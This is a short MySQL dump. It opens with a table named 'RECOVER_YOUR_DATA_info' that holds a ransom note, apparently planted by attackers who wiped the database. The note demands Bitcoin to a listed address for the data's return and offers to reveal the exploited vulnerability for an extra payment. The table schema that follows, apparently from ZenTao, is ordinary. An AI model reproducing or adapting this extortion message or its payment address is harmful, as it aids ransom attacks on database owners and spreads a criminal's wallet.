SET NAMES utf8mb4; DROP TABLE IF EXISTS `RECOVER_YOUR_DATA_info`; CREATE TABLE `RECOVER_YOUR_DATA_info` ( `READ_ME` text ) ENGINE=InnoDB DEFAULT CHARSET=utf8; INSERT INTO `RECOVER_YOUR_DATA_info`(`READ_ME`) VALUES ('If you want to get your data back, send 0.01 BTC to this address: 1zou6cx7kiwLRxDpVVmMQ9KogFNX2qGxJ - This address is assigned to your database. We will know when you have paid. After payment: do not change your database login details, because after payment, we will modify this (current) field and provide a link for you to download your data. If you want to know how we hacked your system and what vulnerability we exploited, pay +0.01 BTC. So if you want this option too, you will have to pay a total of 0.02 BTC.'); DROP TABLE IF EXISTS `zt_acl`; CREATE TABLE `zt_acl` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `account` varchar(30) NOT NULL DEFAULT '', `objectType` varchar(30) NOT NULL DEFAULT '', `objectID` int(10) unsigned NOT NULL DEFAULT '0', `type` varchar(40) NOT NULL DEFAULT 'whitelist', `source` varchar(30) NOT NULL DEFAULT '', PRIMARY KEY (`id`), KEY `idx_object` (`objectType`,`objectID`,`account`), KEY `idx_account` (`account`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;